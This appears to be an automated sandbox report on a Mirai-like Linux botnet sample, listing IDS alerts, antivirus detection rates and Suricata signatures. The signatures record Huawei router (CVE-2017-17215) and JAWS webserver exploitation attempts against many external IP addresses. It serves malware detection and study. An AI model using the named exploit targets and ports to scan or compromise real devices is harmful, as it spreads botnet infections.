              2024-12-13T01:15:20.226342+010028352221A Network Trojan was detected192.168.2.2344096160.77.43.18637215TCP
              2024-12-13T01:15:20.226523+010028352221A Network Trojan was detected192.168.2.2340690160.71.204.24137215TCP
              2024-12-13T01:15:20.275323+010028352221A Network Trojan was detected192.168.2.2356436160.82.240.12537215TCP
              2024-12-13T01:15:21.148268+010028352221A Network Trojan was detected192.168.2.2346992181.196.167.22637215TCP
              2024-12-13T01:15:21.507713+010028352221A Network Trojan was detected192.168.2.2355192190.50.115.6037215TCP
              2024-12-13T01:15:21.773568+010028352221A Network Trojan was detected192.168.2.2354360197.219.184.6037215TCP
              2024-12-13T01:15:22.554379+010028352221A Network Trojan was detected192.168.2.2338950190.225.69.24637215TCP
              2024-12-13T01:15:22.554382+010028352221A Network Trojan was detected192.168.2.2357764190.207.64.25537215TCP
              2024-12-13T01:15:22.788562+010028352221A Network Trojan was detected192.168.2.2335234186.182.27.9237215TCP
              2024-12-13T01:15:23.273028+010028352221A Network Trojan was detected192.168.2.2338270160.56.167.11437215TCP
              2024-12-13T01:15:23.273030+010028352221A Network Trojan was detected192.168.2.2357718160.4.178.24137215TCP
              2024-12-13T01:15:23.273167+010028352221A Network Trojan was detected192.168.2.2345490160.35.241.13637215TCP
              2024-12-13T01:15:23.273222+010028352221A Network Trojan was detected192.168.2.2356584160.4.81.15737215TCP
              2024-12-13T01:15:24.264673+010028352221A Network Trojan was detected192.168.2.2336730186.27.222.337215TCP
              2024-12-13T01:15:25.851642+010028352221A Network Trojan was detected192.168.2.2344568160.82.14.24337215TCP
              2024-12-13T01:15:25.945049+010028352221A Network Trojan was detected192.168.2.2339294157.176.218.23637215TCP
              2024-12-13T01:15:26.195202+010028352221A Network Trojan was detected192.168.2.2351352157.246.27.15337215TCP
              2024-12-13T01:15:27.069686+010028352221A Network Trojan was detected192.168.2.2345214181.121.26.23337215TCP
              2024-12-13T01:15:29.117120+010028352221A Network Trojan was detected192.168.2.2347426181.255.157.15837215TCP
              2024-12-13T01:15:29.227084+010028352221A Network Trojan was detected192.168.2.2356724181.60.76.9237215TCP
              2024-12-13T01:15:29.257528+010028352221A Network Trojan was detected192.168.2.2346498181.239.155.21137215TCP
              2024-12-13T01:15:29.304603+010028352221A Network Trojan was detected192.168.2.2351958181.50.91.12437215TCP
              2024-12-13T01:15:30.054543+010028352221A Network Trojan was detected192.168.2.2342840181.148.237.12537215TCP
              2024-12-13T01:15:30.272957+010028352221A Network Trojan was detected192.168.2.2343592102.172.214.2737215TCP
              2024-12-13T01:15:30.273135+010028352221A Network Trojan was detected192.168.2.2336420102.127.47.12837215TCP
              2024-12-13T01:15:32.180147+010028352221A Network Trojan was detected192.168.2.2350820181.223.179.15137215TCP
              2024-12-13T01:15:32.304533+010028352221A Network Trojan was detected192.168.2.233501841.56.143.8037215TCP
              2024-12-13T01:15:32.304718+010028352221A Network Trojan was detected192.168.2.234653241.30.172.5037215TCP
              2024-12-13T01:15:32.429542+010028352221A Network Trojan was detected192.168.2.2347912157.113.236.12037215TCP
              2024-12-13T01:15:33.317840+010028352221A Network Trojan was detected192.168.2.2357308102.30.77.2737215TCP
              2024-12-13T01:15:33.320074+010028352221A Network Trojan was detected192.168.2.235649041.10.66.9937215TCP
              2024-12-13T01:15:33.320074+010028352221A Network Trojan was detected192.168.2.233338241.138.250.22837215TCP
              2024-12-13T01:15:33.335504+010028352221A Network Trojan was detected192.168.2.233785641.170.191.24737215TCP
              2024-12-13T01:15:33.476480+010028352221A Network Trojan was detected192.168.2.2358196190.212.125.19437215TCP
              2024-12-13T01:15:34.851501+010028352221A Network Trojan was detected192.168.2.2357622181.67.235.15737215TCP
              2024-12-13T01:15:34.867762+010028352221A Network Trojan was detected192.168.2.2338178181.151.219.16937215TCP
              2024-12-13T01:15:35.398644+010028352221A Network Trojan was detected192.168.2.233698641.134.217.4937215TCP
              2024-12-13T01:15:35.492064+010028352221A Network Trojan was detected192.168.2.2334658157.56.225.12637215TCP
              2024-12-13T01:15:35.875701+010028352221A Network Trojan was detected192.168.2.2353090181.226.101.13537215TCP
              2024-12-13T01:15:37.647350+010028352221A Network Trojan was detected192.168.2.2357770181.69.25.24537215TCP
              2024-12-13T01:15:39.008843+010028352221A Network Trojan was detected192.168.2.2356036157.201.2.5137215TCP
              2024-12-13T01:15:39.023271+010028352221A Network Trojan was detected192.168.2.2344062157.197.129.1437215TCP
              2024-12-13T01:15:40.024584+010028352221A Network Trojan was detected192.168.2.2355990157.135.224.6937215TCP
              2024-12-13T01:15:40.054466+010028352221A Network Trojan was detected192.168.2.2334814157.252.248.13937215TCP
              2024-12-13T01:15:42.929788+010028352221A Network Trojan was detected192.168.2.2335568186.148.221.5637215TCP
              2024-12-13T01:15:42.961361+010028352221A Network Trojan was detected192.168.2.2351012186.186.193.8337215TCP
              2024-12-13T01:15:42.992372+010028352221A Network Trojan was detected192.168.2.2358420186.107.86.7737215TCP
              2024-12-13T01:15:43.055058+010028352221A Network Trojan was detected192.168.2.2340284105.9.23.4237215TCP
              2024-12-13T01:15:43.304536+010028352221A Network Trojan was detected192.168.2.2352452105.41.195.10037215TCP
              2024-12-13T01:15:43.976581+010028352221A Network Trojan was detected192.168.2.2342556186.86.153.8637215TCP
              2024-12-13T01:15:43.992529+010028352221A Network Trojan was detected192.168.2.2360368186.254.225.9937215TCP
              2024-12-13T01:15:44.055157+010028352221A Network Trojan was detected192.168.2.2360616186.11.100.25237215TCP
              2024-12-13T01:15:44.273929+010028352221A Network Trojan was detected192.168.2.2348876160.171.161.8437215TCP
              2024-12-13T01:15:44.274048+010028352221A Network Trojan was detected192.168.2.2350588160.192.152.237215TCP
              2024-12-13T01:15:45.555324+010028352221A Network Trojan was detected192.168.2.2345194160.35.220.7837215TCP
              2024-12-13T01:15:45.773377+010028352221A Network Trojan was detected192.168.2.2357444160.48.44.11137215TCP
              2024-12-13T01:15:45.993839+010028352221A Network Trojan was detected192.168.2.2339412186.70.220.16237215TCP
              2024-12-13T01:15:46.024022+010028352221A Network Trojan was detected192.168.2.2342280186.52.12.1837215TCP
              2024-12-13T01:15:46.024253+010028352221A Network Trojan was detected192.168.2.2360700186.185.238.12037215TCP
              2024-12-13T01:15:46.024253+010028352221A Network Trojan was detected192.168.2.2354316186.227.74.20837215TCP
              2024-12-13T01:15:46.024253+010028352221A Network Trojan was detected192.168.2.2349630186.62.130.4037215TCP
              2024-12-13T01:15:46.024254+010028352221A Network Trojan was detected192.168.2.2346672186.125.195.22537215TCP
              2024-12-13T01:15:46.024255+010028352221A Network Trojan was detected192.168.2.2344452186.37.189.17837215TCP
              2024-12-13T01:15:46.055260+010028352221A Network Trojan was detected192.168.2.2350002186.60.14.15037215TCP
              2024-12-13T01:15:46.055260+010028352221A Network Trojan was detected192.168.2.2333950186.172.81.18737215TCP
              2024-12-13T01:15:46.055436+010028352221A Network Trojan was detected192.168.2.2355860186.231.78.4137215TCP
              2024-12-13T01:15:46.070858+010028352221A Network Trojan was detected192.168.2.2341138105.144.101.7637215TCP
              2024-12-13T01:15:46.101459+010028352221A Network Trojan was detected192.168.2.2355690105.87.180.10037215TCP
              2024-12-13T01:15:46.555280+010028352221A Network Trojan was detected192.168.2.2339648160.143.176.10537215TCP
              2024-12-13T01:15:46.602037+010028352221A Network Trojan was detected192.168.2.2332856160.194.123.837215TCP
              2024-12-13T01:15:46.805309+010028352221A Network Trojan was detected192.168.2.2337938105.211.207.6437215TCP
              2024-12-13T01:15:48.183309+010028352221A Network Trojan was detected192.168.2.2358066160.167.175.21237215TCP
              2024-12-13T01:15:48.571041+010028352221A Network Trojan was detected192.168.2.2342014160.107.10.23937215TCP
              2024-12-13T01:15:49.288687+010028352221A Network Trojan was detected192.168.2.2360232160.89.140.8237215TCP
              2024-12-13T01:15:51.851795+010028352221A Network Trojan was detected192.168.2.2339724102.139.45.18437215TCP
              2024-12-13T01:15:51.867276+010028352221A Network Trojan was detected192.168.2.2349722102.95.31.22337215TCP
              2024-12-13T01:15:51.961075+010028352221A Network Trojan was detected192.168.2.2337184157.37.253.12037215TCP
              2024-12-13T01:15:52.852367+010028352221A Network Trojan was detected192.168.2.2354796102.197.142.6537215TCP
              2024-12-13T01:15:54.102085+010028352221A Network Trojan was detected192.168.2.234879441.193.34.13737215TCP
              2024-12-13T01:15:54.134099+010028352221A Network Trojan was detected192.168.2.235225641.252.235.23437215TCP
              2024-12-13T01:15:54.351746+010028352221A Network Trojan was detected192.168.2.2350198102.251.63.2037215TCP
              2024-12-13T01:15:54.382893+010028352221A Network Trojan was detected192.168.2.233843441.10.210.5037215TCP
              2024-12-13T01:15:54.992340+010028352221A Network Trojan was detected192.168.2.233398241.59.235.20037215TCP
              2024-12-13T01:15:55.226545+010028352221A Network Trojan was detected192.168.2.2339502102.85.177.19937215TCP
              2024-12-13T01:15:56.117642+010028352221A Network Trojan was detected192.168.2.2353206181.152.6.10237215TCP
              2024-12-13T01:15:56.137618+010028352221A Network Trojan was detected192.168.2.2359522181.197.26.11637215TCP
              2024-12-13T01:15:56.710954+010028352221A Network Trojan was detected192.168.2.2353290181.14.18.9437215TCP
              2024-12-13T01:15:57.023745+010028352221A Network Trojan was detected192.168.2.234270441.196.32.23537215TCP
              2024-12-13T01:15:57.117993+010028352221A Network Trojan was detected192.168.2.2346054156.72.54.11837215TCP
              2024-12-13T01:16:02.555940+010028352221A Network Trojan was detected192.168.2.2342540186.71.72.16637215TCP
              2024-12-13T01:16:02.570878+010028352221A Network Trojan was detected192.168.2.2349130186.183.5.18537215TCP
              2024-12-13T01:16:02.570941+010028352221A Network Trojan was detected192.168.2.2358214186.91.18.7937215TCP
              2024-12-13T01:16:02.601963+010028352221A Network Trojan was detected192.168.2.2333458186.227.246.9437215TCP
              2024-12-13T01:16:02.711849+010028352221A Network Trojan was detected192.168.2.235082241.57.27.11037215TCP
              2024-12-13T01:16:02.805928+010028352221A Network Trojan was detected192.168.2.233749241.110.61.20837215TCP
              2024-12-13T01:16:02.930807+010028352221A Network Trojan was detected192.168.2.235235241.86.132.16037215TCP
              2024-12-13T01:16:03.180552+010028352221A Network Trojan was detected192.168.2.2357366223.124.96.7337215TCP
              2024-12-13T01:16:03.290152+010028352221A Network Trojan was detected192.168.2.2347562223.74.119.24537215TCP
              2024-12-13T01:16:03.430850+010028352221A Network Trojan was detected192.168.2.2357990223.236.31.11237215TCP
              2024-12-13T01:16:03.555470+010028352221A Network Trojan was detected192.168.2.2356146105.174.153.17737215TCP
              2024-12-13T01:16:03.805260+010028352221A Network Trojan was detected192.168.2.2353592223.193.21.6937215TCP
              2024-12-13T01:16:03.836237+010028352221A Network Trojan was detected192.168.2.2348740223.165.103.1237215TCP
              2024-12-13T01:16:04.586256+010028352221A Network Trojan was detected192.168.2.2342800186.253.149.14237215TCP
              2024-12-13T01:16:04.602329+010028352221A Network Trojan was detected192.168.2.2359352186.197.11.15837215TCP
              2024-12-13T01:16:04.852514+010028352221A Network Trojan was detected192.168.2.2336898160.87.75.14637215TCP
              2024-12-13T01:16:05.846228+010028352221A Network Trojan was detected192.168.2.2343630186.225.199.5837215TCP
              2024-12-13T01:16:06.400561+010028352221A Network Trojan was detected192.168.2.2345042160.18.170.5837215TCP
              2024-12-13T01:16:06.400561+010028352221A Network Trojan was detected192.168.2.2354372160.111.63.20837215TCP
              2024-12-13T01:16:07.477616+010028352221A Network Trojan was detected192.168.2.2346758160.117.179.7037215TCP
              2024-12-13T01:16:07.898876+010028352221A Network Trojan was detected192.168.2.2343712223.122.51.21737215TCP
              2024-12-13T01:16:10.805484+010028352221A Network Trojan was detected192.168.2.2338666156.32.65.14737215TCP
              2024-12-13T01:16:10.899425+010028352221A Network Trojan was detected192.168.2.2357540197.85.88.9037215TCP
              2024-12-13T01:16:14.883603+010028352221A Network Trojan was detected192.168.2.2359144223.221.206.13237215TCP
              2024-12-13T01:16:15.024149+010028352221A Network Trojan was detected192.168.2.2336446181.92.202.20437215TCP
              2024-12-13T01:16:15.024266+010028352221A Network Trojan was detected192.168.2.2344912181.167.20.20337215TCP
              2024-12-13T01:16:15.259142+010028352221A Network Trojan was detected192.168.2.2338644181.68.125.4837215TCP
              2024-12-13T01:16:15.259146+010028352221A Network Trojan was detected192.168.2.2351616181.119.89.12637215TCP
              2024-12-13T01:16:15.477712+010028352221A Network Trojan was detected192.168.2.2338392181.4.177.12437215TCP
              2024-12-13T01:16:15.852972+010028352221A Network Trojan was detected192.168.2.2348510223.117.32.19537215TCP
              2024-12-13T01:16:15.853356+010028352221A Network Trojan was detected192.168.2.2342750223.134.28.18237215TCP
              2024-12-13T01:16:15.879963+010028352221A Network Trojan was detected192.168.2.2346224186.235.255.24337215TCP
              2024-12-13T01:16:16.102763+010028352221A Network Trojan was detected192.168.2.2334708181.26.51.9937215TCP
              2024-12-13T01:16:16.102763+010028352221A Network Trojan was detected192.168.2.2351690181.2.90.22437215TCP
              2024-12-13T01:16:16.102772+010028352221A Network Trojan was detected192.168.2.2355762181.179.174.25037215TCP
              2024-12-13T01:16:16.102772+010028352221A Network Trojan was detected192.168.2.2334914181.75.52.23437215TCP
              2024-12-13T01:16:16.727200+010028352221A Network Trojan was detected192.168.2.2359802181.62.105.11137215TCP
              2024-12-13T01:16:16.806397+010028352221A Network Trojan was detected192.168.2.234992841.87.198.11337215TCP
              2024-12-13T01:16:16.899827+010028352221A Network Trojan was detected192.168.2.2350510223.153.7.19537215TCP
              2024-12-13T01:16:17.103116+010028352221A Network Trojan was detected192.168.2.2337906181.159.69.10637215TCP
              2024-12-13T01:16:17.696107+010028352221A Network Trojan was detected192.168.2.235993041.211.118.11837215TCP
              2024-12-13T01:16:17.868131+010028352221A Network Trojan was detected192.168.2.2356788223.32.162.12837215TCP
              2024-12-13T01:16:17.883514+010028352221A Network Trojan was detected192.168.2.2349902223.42.204.17937215TCP
              2024-12-13T01:16:17.883825+010028352221A Network Trojan was detected192.168.2.2338964223.128.176.7437215TCP
              2024-12-13T01:16:17.977929+010028352221A Network Trojan was detected192.168.2.2339692186.66.4.13437215TCP
              2024-12-13T01:16:18.103066+010028352221A Network Trojan was detected192.168.2.2352804186.146.179.10037215TCP
              2024-12-13T01:16:18.243448+010028352221A Network Trojan was detected192.168.2.2342530186.228.46.1737215TCP
              2024-12-13T01:16:18.353047+010028352221A Network Trojan was detected192.168.2.2336622186.244.0.16037215TCP
              2024-12-13T01:16:18.993454+010028352221A Network Trojan was detected192.168.2.2351574186.245.43.11937215TCP
              2024-12-13T01:16:19.102463+010028352221A Network Trojan was detected192.168.2.2344616186.138.57.17237215TCP
              2024-12-13T01:16:21.178810+010028352221A Network Trojan was detected192.168.2.2341594186.42.197.3337215TCP
              2024-12-13T01:16:21.180816+010028352221A Network Trojan was detected192.168.2.2346936102.231.44.6037215TCP
              2024-12-13T01:16:21.181454+010028352221A Network Trojan was detected192.168.2.2360590102.222.174.9237215TCP
              2024-12-13T01:16:21.227856+010028352221A Network Trojan was detected192.168.2.2336544102.201.243.24337215TCP
              2024-12-13T01:16:21.290850+010028352221A Network Trojan was detected192.168.2.2336856102.226.220.23937215TCP
              2024-12-13T01:16:22.150125+010028352221A Network Trojan was detected192.168.2.2360766102.185.95.24137215TCP
              2024-12-13T01:16:23.010661+010028352221A Network Trojan was detected192.168.2.2337604105.16.48.6237215TCP
              2024-12-13T01:16:23.430850+010028352221A Network Trojan was detected192.168.2.2344338186.30.58.13237215TCP
              2024-12-13T01:16:24.180801+010028352221A Network Trojan was detected192.168.2.2357902105.83.142.3137215TCP
              2024-12-13T01:16:25.946812+010028352221A Network Trojan was detected192.168.2.2353672190.87.89.22337215TCP
              2024-12-13T01:16:25.977735+010028352221A Network Trojan was detected192.168.2.2340898190.102.173.19037215TCP
              2024-12-13T01:16:26.180830+010028352221A Network Trojan was detected192.168.2.2353750105.40.53.1337215TCP
              2024-12-13T01:16:26.196459+010028352221A Network Trojan was detected192.168.2.2344962105.74.116.4937215TCP
              2024-12-13T01:16:26.477778+010028352221A Network Trojan was detected192.168.2.2341996186.6.43.10437215TCP
              2024-12-13T01:16:28.743093+010028352221A Network Trojan was detected192.168.2.2360892181.138.67.237215TCP
              2024-12-13T01:16:28.743227+010028352221A Network Trojan was detected192.168.2.2356296181.230.50.7137215TCP
              2024-12-13T01:16:29.747274+010028352221A Network Trojan was detected192.168.2.2350238197.253.54.4237215TCP
              2024-12-13T01:16:30.853244+010028352221A Network Trojan was detected192.168.2.2337098190.183.128.1837215TCP
              2024-12-13T01:16:30.900218+010028352221A Network Trojan was detected192.168.2.2356426190.115.129.9437215TCP
              2024-12-13T01:16:34.151207+010028352221A Network Trojan was detected192.168.2.2355182197.172.94.20637215TCP
              2024-12-13T01:16:34.401184+010028352221A Network Trojan was detected192.168.2.2349590156.232.221.8637215TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: b3astmode.sh4.elfAvira: detected
              Source: b3astmode.sh4.elfReversingLabs: Detection: 65%
              Source: b3astmode.sh4.elfVirustotal: Detection: 62%Perma Link

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38280 -> 186.209.25.143:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55892 -> 186.64.108.109:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36000 -> 186.154.12.205:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48740 -> 74.79.136.126:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48740 -> 74.79.136.126:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47132 -> 186.117.148.221:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59578 -> 186.195.136.148:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40520 -> 186.91.208.94:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48624 -> 190.96.95.36:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33454 -> 59.25.232.26:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33454 -> 59.25.232.26:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38418 -> 177.8.183.123:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38418 -> 177.8.183.123:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46666 -> 186.161.109.51:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49342 -> 186.119.176.235:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48088 -> 186.156.72.255:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39580 -> 186.201.188.56:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60018 -> 186.166.117.38:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57120 -> 186.174.180.201:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48136 -> 186.12.149.102:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35712 -> 50.207.33.62:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41784 -> 153.202.14.189:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52782 -> 98.207.167.242:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41784 -> 153.202.14.189:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52782 -> 98.207.167.242:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35712 -> 50.207.33.62:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38040 -> 157.228.112.107:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38040 -> 157.228.112.107:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45784 -> 2.164.206.95:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45784 -> 2.164.206.95:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49216 -> 186.86.173.183:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60314 -> 50.55.226.29:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60314 -> 50.55.226.29:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45290 -> 151.70.178.107:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38338 -> 186.75.149.232:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45290 -> 151.70.178.107:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40120 -> 186.62.64.167:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32808 -> 1.126.195.3:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32808 -> 1.126.195.3:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42096 -> 186.234.55.170:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55524 -> 194.41.1.227:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55524 -> 194.41.1.227:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46448 -> 164.221.55.41:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46448 -> 164.221.55.41:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38720 -> 9.215.48.148:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57684 -> 186.204.170.188:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38720 -> 9.215.48.148:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33178 -> 186.73.174.0:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59604 -> 123.35.134.236:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58566 -> 186.136.135.95:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59604 -> 123.35.134.236:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53652 -> 186.121.138.104:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52750 -> 177.164.240.175:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36922 -> 186.170.41.174:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52750 -> 177.164.240.175:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55416 -> 186.24.127.9:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59834 -> 186.118.218.167:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60928 -> 186.223.255.185:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37314 -> 186.123.254.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44446 -> 186.57.199.236:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56098 -> 186.46.190.176:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35366 -> 186.108.208.255:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44568 -> 186.9.106.114:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32944 -> 31.117.171.216:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32944 -> 31.117.171.216:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53136 -> 186.242.228.39:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43788 -> 186.120.100.133:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53768 -> 186.101.133.173:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51570 -> 186.150.234.236:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33460 -> 209.27.77.198:5501
